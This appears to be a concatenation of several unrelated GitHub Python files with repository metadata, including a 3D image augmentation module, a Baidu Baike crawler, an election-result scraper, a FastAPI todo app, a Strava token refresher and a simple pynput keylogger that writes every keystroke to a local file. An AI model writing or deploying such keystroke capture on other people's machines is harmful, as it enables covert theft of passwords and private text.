        sample = {'image': image, 'label': label}
        if self.transform:
            sample = self.transform(sample)
        return sample
class RandomCrop(object):
    """Randomly crop a sub-volume of `output_size` from image and label.

    Volumes not larger than the target are zero-padded first (with a small
    margin) so that a valid random crop origin always exists.
    """
    def __init__(self, output_size):
        # output_size: (w, h, d) of the returned crop.
        self.output_size = output_size
    def __call__(self, sample):
        image, label = sample['image'], sample['label']
        w, h, d = image.shape
        # Pad symmetrically (plus a 3-voxel margin) if any axis is too small.
        if w <= self.output_size[0] or h <= self.output_size[1] or d <= self.output_size[2]:
            pw = (self.output_size[0] - w) // 2 + 3
            ph = (self.output_size[1] - h) // 2 + 3
            pd = (self.output_size[2] - d) // 2 + 3
            image = np.pad(image, ((pw, pw), (ph, ph), (pd, pd)), 'constant', constant_values=0)
            label = np.pad(label, ((pw, pw), (ph, ph), (pd, pd)), 'constant', constant_values=0)
            w, h, d = image.shape
        # Pick a random crop origin; the padding above guarantees each range is non-empty.
        w1 = np.random.randint(0, w - self.output_size[0])
        h1 = np.random.randint(0, h - self.output_size[1])
        d1 = np.random.randint(0, d - self.output_size[2])
        # Identical window applied to image and label keeps them aligned.
        image = image[w1:w1 + self.output_size[0], h1:h1 + self.output_size[1], d1:d1 + self.output_size[2]]
        label = label[w1:w1 + self.output_size[0], h1:h1 + self.output_size[1], d1:d1 + self.output_size[2]]
        return {'image': image, 'label': label}
class RandomRotFlip(object):
    """Rotate by a random multiple of 90° and flip along a random axis.

    Image and label receive the same transform so they stay aligned.
    """
    def __call__(self, sample):
        image, label = sample['image'], sample['label']
        turns = np.random.randint(0, 4)
        image, label = np.rot90(image, turns), np.rot90(label, turns)
        flip_axis = np.random.randint(0, 2)
        image = np.flip(image, flip_axis).copy()
        label = np.flip(label, flip_axis).copy()
        return {'image': image, 'label': label}
class ToTensor(object):
    """Convert a numpy sample to torch tensors, adding a channel axis to the image."""
    def __call__(self, sample):
        img, lab = sample['image'], sample['label']
        d0, d1, d2 = img.shape
        # Prepend a singleton channel dimension and force float32 for the network.
        img_tensor = torch.from_numpy(img.reshape(1, d0, d1, d2).astype(np.float32))
        lab_tensor = torch.from_numpy(lab).long()
        return {'image': img_tensor, 'label': lab_tensor}
| yeshunlong/Reproduce | UA-MT/dataset.py | dataset.py | py | 2,746 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "torch.utils.data.Dataset",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "os.path.join",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
... |
9366664262 | #coding=utf-8
import json
import queue
import random
import re
import time
import traceback
import urllib
import urllib.request
import uuid
import requests
import wipe_off_html_tag
from bs4 import BeautifulSoup
import data_storager
class ParentChild(object):
    """One pending parent-page -> child-page crawl link (fields filled later)."""
    def __init__(self):
        # Parent and child each carry: id, title, url and crawl-depth layer.
        for field in ('_parent_id', '_parent_title', '_parent_url', '_parent_layer',
                      '_child_id', '_child_title', '_child_url', '_child_layer'):
            setattr(self, field, None)
class Spider(object):
"""
layer:第一层,首页, 科学百科
第二层,航空航天
第三层,3·8马来西亚航班失踪事件
第四层,马来西亚航空公司
第h层
"""
def __init__(self):
self._post_lemmas_url = 'https://baike.baidu.com/wikitag/api/getlemmas'
self._get_zhixin_url = 'https://baike.baidu.com/wikiui/api/zhixinmap?lemmaId='
self._get_guess_like_url = 'https://baike.baidu.com/api/wikiui/guesslike?url='
self._parent_childs = queue.Queue() # relationship队列
self._crawl_layers = 4-1 # 需要爬取的最后一层的上一层
def execute(self):
# 录入首页,科学百科
root_url = 'https://baike.baidu.com/science'
root_title = r'科学百科'
root_id = str(uuid.uuid3(uuid.NAMESPACE_DNS, str(root_url)))
# data_storager.insert_webpage(root_id, root_title, root_url, None)
# print("wxm entity:", root_title, root_url)
# 录入首页下二级页面
first_page_html = self.get_firstpage_content("https://baike.baidu.com/science")
first_page_urls = self.get_firstpage_url(first_page_html) # 10条二级页面信息
tag_ids = self.get_firstpage_tagid(first_page_urls) # 9条二级页面信息
first_page_urls_slice = first_page_urls[1:2] # 获取前半部分URL
tag_ids_slice = tag_ids[1:2] # 获取前半部分Tag
for page_id in range(0, 61):
try:
for i in range(0, len(tag_ids_slice)):
# 处理每一个二级页面,如航空航天,天文学,环境生态
print("page_id:" + str(page_id) + ", tagids:" + str(tag_ids_slice[i]))
time.sleep(random.choice(range(1, 3)))
title = first_page_urls_slice[i].get_text()
url = first_page_urls_slice[i].get('href')
id = str(uuid.uuid3(uuid.NAMESPACE_DNS, str(url))) # 为当前网页生成UUID
data_storager.insert_relationship(root_id, root_title, id, title) # 插入首页与二级页面的relationship,如<科学百科_id, 航空航天_id>
data_storager.insert_webpage(id, title, url, None) # 插入二级页面webpage信息,页面内容为空,如航空航天
print("wxm entity:",title, url)
# 录入所有的<二级页面,三级页面>配对信息到缓存中,如航空航天下面的当前page_id下的所有条目,如马航,911事件
self.get_second_page_url(id, title, url, tag_ids_slice[i], page_id)
while (self._parent_childs): # 从第三层(马航,911事件,位于缓存对象的child_xx中)开始,处理队列每一个页面
pc = self._parent_childs.get(0)
self.deal_with_child_webpage(pc) # 用layer控制爬虫爬取深度,调用deal_with_child_webpage方法即插入数据库
except:
print(traceback.format_exc())
print("wxmException,page_id:" + str(page_id))
print("wxmmmmmmmmmmmmmm, tag_ids_slice:" + str(tag_ids_slice[i]))
print("wxmmmmmmmmmmmmmm, page_id:" + str(page_id))
def deal_with_child_webpage(self, pc):
""" 处理当前缓存队列中的对象中的child对象,该方法始终以child为中心处理,parent在前面处理了;从第三层开始的 """
try:
htmL_content = self.get_sub_page_content(pc._child_url) # 获取当前孩子页面的html内容
if htmL_content == None:
return
real_content = self.get_web_real_content(htmL_content) # 获取网页的真正需要入库的content
if len(real_content)>100 and real_content!=None:
real_content=real_content[:100]
data_storager.insert_relationship(pc._parent_id, pc._parent_title, pc._child_id, pc._child_title) # 插入二级页面与三级页面的relationship,如<航空航天_id, 马航_id>
data_storager.insert_webpage(pc._child_id, pc._child_title, pc._child_url, real_content) # 插入当前孩子页面信息,如马航 todo, 解析出htmlcontent中汉字
print("wxm entity:",pc._child_title, pc._child_url)
self.batch_insert_webpage_attributes(pc._child_id, pc._child_title, htmL_content) # 插入当前页面的所有属性信息,如马航下的中文名 3·8马来西亚航班失踪事件
self._crawl_layers = random.choice(range(3, 7))
if pc._child_layer <= self._crawl_layers: # 3<=4,仅从第三层爬到第四层
self.get_sub_urls(pc._child_id, pc._child_title, pc._child_url, pc._child_layer, htmL_content) # 获取当前网页下所有连接,传入第三层的id,title,url,获取第四层信息,加入到缓存队列中
except:
print(traceback.format_exc())
print("wxmException, ", pc._child_id, pc._child_title, pc._child_url)
def batch_insert_webpage_attributes(self, id, title, htmL_content):
soup_findattribute = BeautifulSoup(htmL_content, 'html.parser')
data_findattribute = soup_findattribute.find_all('div', {'class': 'basic-info cmn-clearfix'})
for attributes in data_findattribute:
attribute_names = attributes.find_all('dt', {'class': 'basicInfo-item name'})
names_list = []
for a in attribute_names:
attribute_name = a.get_text()
names_list.append(attribute_name)
attribute_values = attributes.find_all('dd', {'class': 'basicInfo-item value'})
values_list = []
for b in attribute_values:
attributes_value = b.get_text()
values_list.append(attributes_value)
nvs = zip(names_list, values_list)
nvDict = dict((str(names_list), str(values_list)) for names_list, values_list in nvs)
for names_lists, values_lists in nvDict.items():
names_lists_insert = names_lists
value_lists_insert = values_lists.strip("\n")
data_storager.insert_attributes(id, title, names_lists_insert, value_lists_insert)
    def get_web_real_content(self, htmL_content):
        """Strip tags and boilerplate chrome from a lemma page's main content.

        NOTE(review): str.strip removes *characters* from both string ends,
        not literal phrases — these chained strips likely don't remove the
        intended prefixes; confirm against sample pages.
        """
        soup = BeautifulSoup(htmL_content, 'html.parser')
        main_content = soup.find('div', {'class': 'main-content'})
        return wipe_off_html_tag.filter_tags(str(main_content)).strip(r'收藏\n查看我的收藏\n').\
            strip(r'有用+1\n已投票\n').strip(r'编辑\n锁定\n').strip(r'审核\n。')
def get_sub_urls(self, id, title, url, layer, content):
soup = BeautifulSoup(content, 'html.parser')
body = soup.body # 获取body部分
# 爬取para中连接词条
try:
link_list1 = {}
link_body1 = body.find_all('div', {'class': 'para', 'label-module': "para"})
for link_body in link_body1:
result_list = link_body.find_all('a', {'target': '_blank'})
if result_list:
for link in result_list:
fourth_page_url_postfix = link.get('href')
pattern = re.compile(r'/pic')
match = pattern.match(fourth_page_url_postfix)
if not match:
sub_title = link.get_text()
sub_url = "http://baike.baidu.com" + fourth_page_url_postfix
link_list1[sub_title] = sub_url
except:
print(traceback.format_exc())
print("wxmException, 爬取para中连接词条 todo print 出错更详细信息:" + id + ", " + title + ", " + url)
# 爬取相关信息词条
try:
link_list2 = {}
link_body2 = body.find('div', {'class': 'zhixin-box'})
newlemmaid = link_body2['data-newlemmaid']
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.36'
}
data = {"lemmaId": newlemmaid}
request_url = self._get_zhixin_url + str(newlemmaid)
content = requests.get(request_url, params=data, headers=headers).content
response = content.decode('unicode-escape').replace("\/", "/")
js = json.loads(response)
for i in range(len(js)):
title_urls = js[i]['data']
for j in range(len(title_urls)):
sub_title = js[i]['data'][j]['title']
sub_url = js[i]['data'][j]['url']
link_list2[sub_title] = sub_url
except:
print(traceback.format_exc())
print("wxmException, 爬取相关信息词条 todo print 出错更详细信息:" + id + ", " + title + ", " + url)
# 爬取猜你喜欢词条
try:
link_list3 = {}
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.36'
}
data = {
"url": sub_url,
"lemmaTitle": sub_title,
"eid": 202
}
request_url = self._get_guess_like_url + str(sub_url) + "&lemmaTitle=" + sub_title + "&eid=202"
content = requests.get(request_url, params=data, headers=headers).content
try:
jso1 = json.loads(content)
ad_place_data = jso1["ad_place_list"][0]["ad_place_data"]
ad_place_data2 = ad_place_data.replace("\/", "/")
jso2 = json.loads(ad_place_data2)
ads = jso2["ads"]
for ad in ads:
sub_title = ad['title']
sub_url = ad['url']
link_list3[sub_title] = sub_url
except:
print(traceback.format_exc())
print("wxmException, 爬取猜你喜欢词条 json 解析失败")
except:
print(traceback.format_exc())
print("wxmException, 爬取猜你喜欢词条 todo print 出错更详细信息:" + id + ", " + title + ", " + url)
try:
dictMerged2 = {}
dictMerged1 = dict(link_list1, **link_list2)
dictMerged2 = dict(dictMerged1, **link_list3)
except:
print(traceback.format_exc())
print("wxmException, 合并dict失败")
for sub_title, sub_url in dictMerged2.items():
pc = ParentChild()
pc._parent_id = id
pc._parent_title = title
pc._parent_url = url
pc._parent_layer = layer
child_id = str(uuid.uuid3(uuid.NAMESPACE_DNS, str(sub_url))) # 为当前孩子页面生成UUID
pc._child_id = child_id
pc._child_title = sub_title
pc._child_url = sub_url
pc._child_layer = pc._parent_layer + 1
self._parent_childs.put(pc)
    def get_sub_page_content(self, url3, data=None):
        """Fetch a lemma page and return its HTML text, or None on failure.

        NOTE(review): requests.get raises requests exceptions, not
        urllib.request.HTTPError/URLError — the specific handlers below
        appear unreachable; only the bare except actually fires.
        """
        header = {
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
            'Accept-Encoding': 'gzip,deflate,sdch',
            'Accept-Language': 'zh-CN,zh;q=0.8',
            'Connection': 'keep-alive',
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'
        }
        timeout = 180
        try:
            result2 = requests.get(url3, headers=header, timeout=timeout)
            result2.encoding = 'utf-8'
            return result2.text
        except urllib.request.HTTPError as e:
            print(traceback.format_exc())
            print('wxmException, 1:', e.code)
        except urllib.request.URLError as e:
            print(traceback.format_exc())
            print('wxmException, 2:', e.reason)
        except:
            print(traceback.format_exc())
            print('wxmException, 0')
        return None
def get_second_page_url(self, id, title, url, tagId, page):
"""
父亲id是传入的,孩子id是生成的
"""
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.36'
}
data = {
"limit": "24",
"timeout": 3000,
"filterTags": [],
"tagId": tagId,
"fromLemma": False,
"contentLength": 40,
"page": page
}
try:
content = requests.post(self._post_lemmas_url, data=data, headers=headers).content
response = content.decode('unicode-escape').replace("\/", "/")
js = json.loads(response)
for i in range(len(js['lemmaList'])):
sub_title = (js['lemmaList'][i]['lemmaTitle'])
sub_url = (js['lemmaList'][i]['lemmaUrl'])
pc = ParentChild()
pc._parent_id = id
pc._parent_title = title
pc._parent_url = url
pc._parent_layer = 2
child_id = str(uuid.uuid3(uuid.NAMESPACE_DNS, str(sub_url))) # 为当前孩子页面生成UUID
pc._child_id = child_id
pc._child_title = sub_title
pc._child_url = sub_url
pc._child_layer = 3
self._parent_childs.put(pc)
except:
print(traceback.format_exc())
print("wxmException, ", id, title, url, tagId, page) # todo 描述
def get_firstpage_content(self, url, data=None):
header = {
'Accept': 'text/css,*/*;q=0.1',
'Accept-Encoding': 'gzip,deflate,sdch',
'Accept-Language': 'zh-CN,zh;q=0.8',
'Connection': 'keep-alive',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'
}
timeout = random.choice(range(80, 180))
while True:
try:
rep = requests.get(url, headers=header, timeout=timeout)
rep.encoding = 'utf-8'
req = urllib.request.Request(url, data, header)
response = urllib.request.urlopen(req, timeout=timeout)
response.close()
break
except urllib.request.HTTPError as e:
print(traceback.format_exc())
print('wxmException, 1:', e)
time.sleep(random.choice(range(1,3)))
except urllib.request.URLError as e:
print(traceback.format_exc())
print('wxmException, 2:', e)
time.sleep(random.choice(range(1,3)))
except:
print(traceback.format_exc())
print('wxmException 0')
return rep.text
    def get_firstpage_url(self, html):
        """Parse the portal page and return the category <a> tags (title + href)."""
        bs = BeautifulSoup(html, "html.parser")
        body = bs.body # grab the <body> section
        data = body.find_all('div', {'class': 'category-info'}) # one div per category
        urls_list = []
        for a in data:
            # The category link sits inside each block's <h5> heading.
            ul = a.find('h5')
            url = ul.find('a')
            urls_list.append(url)
        return urls_list
    def get_firstpage_tagid(self, first_page_urls):
        """Extract the numeric tagId embedded in each category URL.

        Also drops the first entry from both the tag list and the caller's
        URL list (mutates *first_page_urls* in place), keeping the two
        lists aligned.
        """
        links_list = []
        for i in first_page_urls:
            links = i.get('href')
            links_list.append(links)
        tagid_list = []
        for b in links_list:
            # The tagId occupies a fixed character slice of the category URL.
            tagid = b[46:51]
            tagid_list.append(tagid)
        # The lists can be sliced here to split the crawl across machines;
        # both must be trimmed identically to stay in sync.
        del first_page_urls[0]
        del tagid_list[0]
        return tagid_list
if __name__ == '__main__':
spider = Spider()
spider.execute() | ChandlerBang/Movie-QA-System | jw/spider.py | spider.py | py | 17,068 | python | en | code | 58 | github-code | 36 | [
{
"api_name": "queue.Queue",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "uuid.uuid3",
"line_number": 50,
"usage_type": "call"
},
{
"api_name": "uuid.NAMESPACE_DNS",
"line_number": 50,
"usage_type": "attribute"
},
{
"api_name": "time.sleep",
"line... |
19270176336 | #!C:\Users\Bhavya Mulpuri\AppData\Local\Programs\Python\Python36-32\python.exe
import requests
from bs4 import BeautifulSoup
import cgi, cgitb
import csv
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
import numpy as np
# CGI entry point: scrape ECI constituency-wise results and plot vote counts.
print("Content-Type:text/html\r\n\r\n")
cgitb.enable()
form = cgi.FieldStorage()
# Hard-coded state/constituency; the commented expressions show the intended
# form fields (s1 / s2) once the HTML form is wired up.
state = "S29"  # form["s1"].value
constituency = "82"  # form["s2"].value
url = "http://eciresults.nic.in/Constituencywise" + state + constituency + ".htm?ac=" + constituency
print(url)
page = requests.get(url)
soup = BeautifulSoup(page.content, 'html.parser')
table = soup.find('table', border="1")
t_rows = table.find_all('tr', style="font-size:12px;")
# Write candidate name, party and vote count for each result row.
# The writer is created once, outside the loop (the original rebuilt it per row).
with open('data.csv', 'w') as f:
    data_writer = csv.writer(f, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
    for row in t_rows:
        result = row.find_all('td')
        data_writer.writerow([result[0].text.strip(), result[1].text.strip(), result[2].text.strip()])
x_axis = []
y_axis = []
z_axis = []
with open('data.csv', 'r') as f:
    for record in csv.reader(f, delimiter=","):
        # Fixed: was `len(record) is not 0` — an identity check on an int,
        # which only works by accident of CPython's small-int caching.
        if len(record) != 0:
            x_axis.append(record[0])
            y_axis.append(record[1])
            z_axis.append(int(record[2]))
fig = plt.figure()
plt.bar(x_axis, z_axis, width=0.8, color=['red', 'green', 'pink', 'blue', 'black'])
for i, v in enumerate(z_axis):
    plt.text(x_axis[i], v, str(v), horizontalalignment='center', fontsize=10)
plt.xlabel('candidates')
plt.ylabel('number of votes')
plt.title('Constituencywise result Data Visualization')
num = np.arange(len(x_axis))
plt.xticks(num, x_axis, fontsize=6, rotation=30)
# Fixed: save BEFORE show() — show() tears down the figure, so the original
# savefig call produced an empty file.
plt.savefig('C:/xampp/htdocs/plot.pdf')
plt.show()
{
"api_name": "cgitb.enable",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "cgi.FieldStorage",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"l... |
# Gold Mine / book p375 / DP
# My own approach: relax cell sums right-to-left with a BFS-style queue.
from collections import deque
T = int(input())
# Offsets examined from a cell toward the column to its LEFT:
# up-left, left, down-left (best sums are propagated from right to left).
dx = [-1, 0, 1]
dy = [-1, -1, -1]
for _ in range(T):
    queue = deque()
    n, m = map(int, input().split())
    # Fix: the original named these `str` (shadowing the builtin) and reused
    # loop variable `i` across nested loops.
    values = list(map(int, input().split()))
    data = [[values[i * m + j] for j in range(m)] for i in range(n)]
    # answer[i][j] = best gold collectable on a path ending at (i, j),
    # seeded with the rightmost column's own values.
    answer = [[0 for _ in range(m)] for _ in range(n)]
    for i in range(n):
        answer[i][m - 1] = data[i][m - 1]
        queue.append((i, m - 1))
    while queue:
        x, y = queue.popleft()
        for k in range(3):
            nx = x + dx[k]
            ny = y + dy[k]
            # Re-relax a neighbour only when it strictly improves.
            if 0 <= nx < n and 0 <= ny < m and answer[nx][ny] < answer[x][y] + data[nx][ny]:
                answer[nx][ny] = answer[x][y] + data[nx][ny]
                queue.append((nx, ny))
    # Best starting row in the first column (the original shadowed builtin `max`).
    best = 0
    for i in range(n):
        best = max(best, answer[i][0])
    print(best)
# 책에서 푼 방법
# 테스트 케이스(Test Case) 입력
# for tc in range(int(input())):
# n,m = map(int,input().split())
# array = list(map(int,input().split()))
#
# # 다이나믹 프로그래밍을 위한 2차원 DP 테이블 초기화
# dp = []
# index = 0
# for i in range(n):
# dp.append(array[index:index+m])
# index += m
#
# # 다이나믹 프로그래밍 진행
# for j in range(1,m):
# for i in range(n):
# print(dp)
# # 왼쪽 위에서 오는 경우
# if i == 0:
# left_up = 0
# else:
# left_up = dp[i-1][j-1]
# # 왼쪽 아래에서 오는 경우
# if i == n-1:
# left_down = 0
# else:
# left_down = dp[i+1][j-1]
# # 왼쪽에서 오는 경우
# left = dp[i][j-1]
# dp[i][j] = dp[i][j] + max(left_up, left_down, left)
#
#
# result = 0
# for i in range(n):
# result = max(result,dp[i][m-1])
#
# print(result)
# 2
# 3 4
# 1 3 3 2 2 1 4 1 0 6 4 7
# 4 4
# 1 3 1 5 2 2 4 1 5 0 2 3 0 6 1 2 | Girin7716/PythonCoding | pythonBook/Problem Solving/Q31.py | Q31.py | py | 2,169 | python | ko | code | 1 | github-code | 36 | [
{
"api_name": "collections.deque",
"line_number": 11,
"usage_type": "call"
}
] |
from fastapi import FastAPI, HTTPException
from fastapi.middleware.cors import CORSMiddleware
from model import Todo
app = FastAPI()
from database import(
    fetchOneTodo,
    fetchAllTodos,
    createTodo,
    updateTodo,
    removeTodo,
)
# Front-end origins allowed to call this API through CORS.
origins = ['http://localhost:3000', 'http://localhost:4000']
app.add_middleware(
    CORSMiddleware,
    allow_origins=origins,
    allow_credentials= True,
    allow_methods=["*"],
    allow_headers=["*"],
)
@app.get("/")
def read_root():
    """Landing / health-check route."""
    return {"Hello":"Kiki"}
@app.get("/api/todo")
async def get_todo():
    """Return every stored todo item."""
    response = await fetchAllTodos()
    return response
@app.get("/api/todo/{title}", response_model=Todo)
async def get_todo_by_id(title):
    """Return the single todo matching *title*; 404 if absent."""
    response = await fetchOneTodo(title)
    if response:
        return response
    raise HTTPException(404,f"No Todo Item by that {title}")
# Create
@app.post("/api/todo/", response_model=Todo)
async def post_todo(todo:Todo):
    """Create a todo from the request body; 400 if the insert fails."""
    response = await createTodo(todo.dict())
    if response:
        return response
    raise HTTPException(400,"Something went wrong. Bad Request")
# Update
@app.put("/api/todo/{title}/", response_model=Todo)
async def put_todo(title:str, desc:str):
    """Update the description of the todo identified by *title*; 404 if absent."""
    response = await updateTodo(title, desc)
    if response:
        return response
    raise HTTPException(404, f"No Todo Item by that {title}")
# Delete
@app.delete("/api/todo/{title}")
async def delete_todo(title):
    """Delete the todo identified by *title*; 404 if absent."""
    response = await removeTodo(title)
    if response:
        return "Deleted todo item"
    raise HTTPException(404, f"There is no TODO item with title {title}")
'''
Can run the server with command below
uvicorn main:app --reload --port 4000
''' | coronel08/farm-stack-todo | backend/main.py | main.py | py | 1,660 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "fastapi.FastAPI",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "fastapi.middleware.cors.CORSMiddleware",
"line_number": 18,
"usage_type": "argument"
},
{
"api_name": "database.fetchAllTodos",
"line_number": 32,
"usage_type": "call"
},
{
"... |
7075228208 | """Strava API key update.
:authors
JP at 17/04/20
"""
from google.cloud import firestore
import logging
import requests
import time
db = firestore.Client()
collection = db.collection('strava')
class RefreshTokenBadRequest(Exception):
"""Expection for an invalid request to Strava to get a new token."""
pass
def refresh_key(event, context):
"""Triggered from a message on a Cloud Pub/Sub topic. Update Strava keys stored in Firestore."""
for doc in collection.stream():
data = doc.to_dict()
logging.info(f'got key {doc.id}')
if time.time() < data['expires_at']:
logging.info(f'expiry time {data["expires_at"]} not greater than current {time.time()}')
continue
else:
logging.info(f'expiry time {data["expires_at"]} greater than current so getting a new access token')
request_params = {'client_id': data['client_id'],
"client_secret": data['client_secret'],
"grant_type": "refresh_token",
"refresh_token": data['refresh_token']}
response = requests.post("https://www.strava.com/api/v3/oauth/token", params=request_params)
logging.info(f'made request to Strava and got response code {response.status_code}')
if response.status_code != 200:
logging.error(f'Bad request {response.status_code} content {response.text}')
raise RefreshTokenBadRequest
response_dict = response.json()
update_doc = collection.document(doc.id)
update_doc.update({'access_token': response_dict['access_token'],
'refresh_token': response_dict['refresh_token'],
'expires_at': response_dict['expires_at']})
logging.info(f'updated {doc.id} with new expiry time {response_dict["expires_at"]}')
| j-penson/strava-leaderboards | functions/strava_key/main.py | main.py | py | 1,886 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "google.cloud.firestore.Client",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "google.cloud.firestore",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "logging.info",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "tim... |
import sqlite3
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import datetime
'''
This is a simple tool I made to create a plot graph with the data from the database.
You can manually enter the prefixes of the companies you want to look at in the
prefix_list and it will use all the data it can find in the database corresponding
to that prefix. This tool is used to determine the sentiment score and volume over
a chosen period of time.
'''
# Set the period of time you want to analyse - in days
time_period = 20
# Dates: analysis window runs from past_date (today - time_period) to today.
date = datetime.datetime.today()
#date = date - datetime.timedelta(days=time_period)
past_date = date - datetime.timedelta(days=time_period)
# Module-level connection/cursor shared by the whole script.
conn = sqlite3.connect('Cobalt_Blue.db')
c = conn.cursor()
def select_scraped_data(prefix):
    """Return all (post_date, sentiment, price) rows stored for company *prefix*."""
    c.execute("SELECT post_date, sentiment, price FROM Scraped_data WHERE company=?", (prefix,))
    data = c.fetchall()
    return data
# Set companys to graph by prefix eg COB
prefix_list = ['4DS']
# Loop through company prefix
graph = True
previous_item = [past_date]
for prefix in prefix_list:
try:
print("Analysing: " + prefix + " for past " + str(time_period) + " days")
data = select_scraped_data(prefix)
# Declaring x,y coord variables for graph
x = []
y = []
x2 = []
y2 = []
# Converting to datestamp to sort by date
date_data = []
clean_data = []
for item in data:
item = list(item)
item[0] = datetime.datetime.strptime(item[0], "%d/%m/%y")
date_data.append(item)
# Sorting dates and saving wanted dates in new list.
date_data.sort()
for item in date_data:
if item[0] > past_date:
clean_data.append(item)
# Getting volume and sentiment
volume, sentiment = 0, 0
buy, sell, hold, none = 0, 0, 0, 0
for item in clean_data:
print(item)
volume += 1
if item[1] == 'Buy':
buy += 1
sentiment += 1
elif item[1] == 'Sell':
sell += 1
sentiment -= 1
elif item[1] == 'Hold':
hold += 1
if sentiment > 1:
sentiment -= 1
elif sentiment < -1:
sentiment += 1
elif item[1] == 'None':
none += 1
# Sorting dates to plot only end of day figure and decaying sentiment for time without posts.
if item[0] > previous_item[0]:
#print(item)
# Finding days between posts and decaying sentiment at 0.25/day if no post.
sent_decay = item[0] - previous_item[0]
sent_decay = str(sent_decay)
sent_decay = sent_decay[0:2]
sent_decay = int(sent_decay)
sent_decay = sent_decay/4
print(sent_decay)
if sentiment > 1 and sent_decay > 0.25:
if sentiment >= sent_decay:
sentiment -= sent_decay
else:
sentiment = 0
# Converting date format for graphing and appending to coords.
new_date = item[0].strftime('%d-%m-%Y')
x.append(new_date)
x2.append(new_date)
y.append(sentiment)
y2.append(item[2])
previous_item = item
# Buy/sell ratio
ratio = ((buy - sell) / (buy + sell + hold + none))*100
ratio = round(ratio, 2)
# Volume ratio
volume_ratio = round(volume / time_period, 1)
print("Volume: " + str(volume))
print("Buy: " + str(buy))
print("Sell: " + str(sell))
print("Hold: " + str(hold))
print("None: " + str(none))
print("Buy strength: " + str(ratio) + "%")
print("Volume Strength: " + str(volume_ratio) + " posts per day")
print("Sentiment Score: " + str(sentiment))
ratio = 0
volume_ratio = 0
except Exception as e:
print("Error - No data in that time period!")
print(e)
graph = False
print()
if graph:
# Setting graph format - change between months/days and set fmt to %m or %d
#months = mdates.MonthLocator()
days = mdates.DayLocator()
fmt = mdates.DateFormatter('%d')
# Converting back to datetime to graph
x = [datetime.datetime.strptime(d,'%d-%m-%Y').date() for d in x]
x2 = [datetime.datetime.strptime(d,'%d-%m-%Y').date() for d in x2]
# Plotting coords
fig, ax = plt.subplots()
ax2 = ax.twinx()
ax.plot(x, y, label='Sentiment', color='r')
ax.set_xlabel('Time (days)')
ax.set_ylabel('Sentiment Score')
ax2.plot(x2, y2, label='Price', color='b')
ax2.set_ylabel("Price at Post")
# Getting legends for graph
handles, labels = ax.get_legend_handles_labels()
ax.legend(handles, labels, loc='center left')
# Setting x axis format
ax.xaxis.set_major_locator(days)
ax.xaxis.set_major_formatter(fmt)
# Graphing info
plt.title(str(prefix) + ' Sentiment')
plt.legend()
plt.show()
# Closing database connections
c.close()
conn.close() | Barrenjoey/Company-Sentiment-Project | Graph.py | Graph.py | py | 4,618 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "datetime.datetime.today",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "datetime.timedelta",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "sql... |
21539613759 | from pynput import keyboard
# Defines a function for the keylogger
def keyPressed(key):
    """pynput on_press callback: echo the key and append its character to keyfile.text.

    Bug fix: the original called ``logKey.write()`` with no argument, which
    raised a TypeError that the bare ``except`` silently swallowed — so no
    keystroke was ever logged.
    """
    print(str(key))
    with open("keyfile.text", 'a') as logKey:
        try:
            char = key.char
            # Special keys (shift, ctrl, ...) expose no printable char.
            if char is not None:
                logKey.write(char)
        except AttributeError:
            print("Error getting char")
if __name__ == "__main__":
listener = keyboard.Listener(on_press=keyPressed)
listener.start()
input() | Roscalion/cybersecuritykeylogger | keylogger.py | keylogger.py | py | 410 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pynput.keyboard.Listener",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "pynput.keyboard",
"line_number": 15,
"usage_type": "name"
}
] |
39467758886 | import errno
import sqlite3
import os
from mdde_stats.service.data import Benchmark
class LocalDataManager:
    """Owns a local SQLite database file used to persist MDDE benchmark statistics.

    Usable as a context manager: ``with manager as benchmark:`` opens a
    connection and yields a Benchmark bound to it; on exit the transaction is
    committed (or rolled back if the body raised) and the connection closed.
    """

    # Name of the single log table managed by this class.
    TABLE_LOGS = 'logs'

    def __init__(self, data_dir: str):
        """
        Constructor
        :param data_dir: path to directory where database should be stored
        :raises TypeError: if data_dir is None
        """
        if data_dir is None:
            raise TypeError('data_dir path was not supplied')
        self._db_name = 'mdde_stats.db'
        self._data_dir = os.path.abspath(data_dir)
        try:
            # Create data folder if not exists
            os.makedirs(self._data_dir)
        except OSError as e:
            # An already-existing folder is fine; anything else is a real error.
            if e.errno != errno.EEXIST:
                raise
        self._full_path = os.path.join(self._data_dir, self._db_name)
        self._connection = None

